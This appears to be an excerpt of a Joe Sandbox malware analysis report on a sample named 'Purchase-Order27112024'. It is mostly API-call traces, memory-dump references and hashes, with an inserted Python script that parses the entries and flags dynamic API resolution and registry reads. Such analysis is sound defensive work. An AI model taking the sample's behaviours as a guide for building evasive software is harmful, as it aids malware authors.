• Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                                                                      APIs
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                        • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2232296174.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2232279863.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000000.00000002.2232310367.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000000.00000002.2232326142.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_10000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                      • String ID:
                                                                                                      • API String ID: 4216380887-0
                                                                                                      • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                      • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                      • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                      • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                      APIs
                                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                      • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2232296174.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2232279863.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000000.00000002.2232310367.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000000.00000002.2232326142.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_10000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$Free$Alloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1780285237-0
                                                                                                      • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                      • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                      • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                      • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                                                                      • wsprintfW.USER32 ref: 00404A70
                                                                                                      • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ItemTextlstrlenwsprintf
                                                                                                      • String ID: %u.%u%s%s$&B
                                                                                                      • API String ID: 3540041739-2907463167
                                                                                                      • Opcode ID: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
                                                                                                      • Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
                                                                                                      • Opcode Fuzzy Hash: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
                                                                                                      • Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2232296174.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2232279863.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000000.00000002.2232310367.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000000.00000002.2232326142.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_10000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FreeGlobal
                                                                                                      • String ID:
                                                                                                      • API String ID: 2979337801-0
                                                                                                      • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                      • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                      • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                      • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                      APIs
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                      • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2232296174.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2232279863.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000000.00000002.2232310367.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000000.00000002.2232326142.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_10000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1148316912-0
                                                                                                      • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                      • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                      • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                      • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
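The entries in this listing are machine-generated and carry no narrative, so what follows is an added example, written for this page and not part of the Joe Sandbox report or its tooling, of how a triage script can consume them. It parses the "Api.MODULE(args), ref: addr" entry format (including the "Part of subcall function" prefix and the argument-less wsprintfW form), checks each function for ordered API sequences, and reports the two behaviours visible here: the wide-to-ANSI conversion feeding GetProcAddress in the entry directly above, and the RegOpenKeyExW/RegQueryValueExW pair in the Software\Microsoft\Windows\CurrentVersion entry further down the listing. The function labels (fn_at_...), the rule table and the finding names are assumptions chosen for the example; the input lines are copied from this report.

```python
"""Triage helper for Joe Sandbox API-trace entries (added example, not report output)."""
import re
from collections import Counter

# Constructed input: entries copied from two function listings in this report.
# The dict keys are labels chosen for this example; the report does not name functions.
SAMPLE_FUNCTIONS = {
    "fn_at_10001617": r"""
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
• GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
• WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
• GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
• GlobalFree.KERNEL32(00000000), ref: 10001642
""",
    "fn_at_00405E3F": r"""
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E3F
• RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E60
• RegCloseKey.ADVAPI32(?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83
""",
}

# One report entry: optional "Part of subcall function X:" prefix, Api.MODULE, optional
# "(args)", optional "ref: addr" (the wsprintfW entry in this report has no argument list).
ENTRY_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"(?:\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?"
)

# Predefined registry hive handles, as they may appear among the printed stack values.
HIVES = {
    "80000000": "HKEY_CLASSES_ROOT",
    "80000001": "HKEY_CURRENT_USER",
    "80000002": "HKEY_LOCAL_MACHINE",
    "80000003": "HKEY_USERS",
}

# Finding name -> APIs that must all occur in the function, in this relative order
# (assumed rule set for the example; extend with the sequences you care about).
RULES = {
    "dynamic_api_resolution": ("WideCharToMultiByte", "GetProcAddress"),
    "registry_read": ("RegOpenKeyExW", "RegQueryValueExW"),
}


def parse_function(listing):
    """Turn the bullet lines of one function entry into call records."""
    calls = []
    for line in listing.splitlines():
        m = ENTRY_RE.match(line)
        if not m:
            continue
        raw_args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod").upper(),
            "args": [a.strip() for a in raw_args.split(",")] if raw_args is not None else [],
            "ref": int(m.group("ref"), 16) if m.group("ref") else None,
            "subcall": m.group("sub"),
        })
    return calls


def matches_in_order(calls, sequence):
    """True if every API in `sequence` occurs in `calls` in that relative order."""
    names = iter(c["api"] for c in calls)
    return all(any(name == wanted for name in names) for wanted in sequence)


def registry_paths(calls):
    """Key paths visible among the printed arguments of Reg* calls."""
    return sorted({a for c in calls if c["api"].startswith("Reg")
                   for a in c["args"] if "\\" in a})


def triage(functions):
    """Per-function summary: modules touched, matched behaviour rules, registry context."""
    report = {}
    for label, listing in functions.items():
        calls = parse_function(listing)
        report[label] = {
            "calls": calls,
            "modules": Counter(c["module"] for c in calls),
            "findings": [f for f, seq in RULES.items() if matches_in_order(calls, seq)],
            "registry_paths": registry_paths(calls),
            "hives": sorted({HIVES[a] for c in calls for a in c["args"] if a in HIVES}),
        }
    return report


if __name__ == "__main__":
    for label, summary in triage(SAMPLE_FUNCTIONS).items():
        print(label, dict(summary["modules"]), summary["findings"],
              summary["registry_paths"], summary["hives"])
```

One caveat when reading the output: Joe Sandbox prints more stack slots than the API has parameters, so the hive constant and the key path recovered here are context from the stack at the call site, not necessarily the call's own hKey or lpSubKey arguments; treat them as leads to confirm in the disassembly rather than as resolved parameters.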
                                                                                                      APIs
                                                                                                      • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                                                                      • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                                                                      • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                                                                      • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                                                                      • DeleteObject.GDI32(00000000), ref: 00401D36
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 1849352358-0
                                                                                                      • Opcode ID: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                                                                      • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                                                                      • Opcode Fuzzy Hash: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                                                                      • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                                                                      APIs
                                                                                                      • GetDC.USER32(?), ref: 00401D44
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D51
                                                                                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D60
                                                                                                      • ReleaseDC.USER32(?,00000000), ref: 00401D71
                                                                                                      • CreateFontIndirectW.GDI32(0040BDA0), ref: 00401DBC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                      • String ID:
                                                                                                      • API String ID: 3808545654-0
                                                                                                      • Opcode ID: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
                                                                                                      • Instruction ID: b353f613be9e85a79a94993a8857fa9d5f5277bee054f22ce4286571968d2ed5
                                                                                                      • Opcode Fuzzy Hash: 42daf7e862d24205765a2c482219e26c12b6d25ebfb053d7a945aa5fdfa94cc8
                                                                                                      • Instruction Fuzzy Hash: 4A016D31948285EFEB416BB0AE0AFDABF74EB65305F144479F141B62E2C77810058B6E
                                                                                                      APIs
                                                                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$Timeout
                                                                                                      • String ID: !
                                                                                                      • API String ID: 1777923405-2657877971
                                                                                                      • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                                                      • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                                                                      • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                                                                      • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                                                                      APIs
                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E3F
                                                                                                      • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E60
                                                                                                      • RegCloseKey.ADVAPI32(?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                      • String ID: Call
                                                                                                      • API String ID: 3677997916-1824292864
                                                                                                      • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                      • Instruction ID: 600534e839ec184522a2ed62e812a695e1e378dc1a2fe7ff70d8343822b3fb0e
                                                                                                      • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                                                                      • Instruction Fuzzy Hash: A7015A3114020EEACB218F56EC08EEB3BA8EF54390F00413AF944D2220D334DA64CBE5
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00405999
                                                                                                      • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 004059A3
                                                                                                      • lstrcatW.KERNEL32(?,00409014), ref: 004059B5
                                                                                                      Strings
                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405993
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharPrevlstrcatlstrlen
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                      • API String ID: 2659869361-3936084776
                                                                                                      • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                      • Instruction ID: a3647a5b8e032715a8ecc0c41ac115d98c53e42c85c632df021e5d83325ae185
                                                                                                      • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                                                                      • Instruction Fuzzy Hash: 74D0A731101930AAD212BB548C04DDF739CEE45301740407BF605B30A1C77C1D418BFD
                                                                                                      APIs
                                                                                                      • GlobalFree.KERNEL32(005AEA58), ref: 00401B92
                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000804), ref: 00401BA4
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AllocFree
                                                                                                      • String ID: Call$XZ
                                                                                                      • API String ID: 3394109436-416846113
                                                                                                      • Opcode ID: e0b4e13f50ba2418b6978e6b85f2920caab44446673b19aed4cb7ec32939bc14
                                                                                                      • Instruction ID: 564068f58b03e261203e6aa09dab7f6fb5d2f7f966de6333b684a5604785f160
                                                                                                      • Opcode Fuzzy Hash: e0b4e13f50ba2418b6978e6b85f2920caab44446673b19aed4cb7ec32939bc14
                                                                                                      • Instruction Fuzzy Hash: C02190B2610501ABCB10EBA4DD859AEB3B8EB45318B24443BF141B72D1D77CAC419F6D
                                                                                                      APIs
                                                                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                                                                      • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                                                                      • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                                                                        • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                      • String ID:
                                                                                                      • API String ID: 1404258612-0
                                                                                                      • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                                                                      • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                                                                      • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
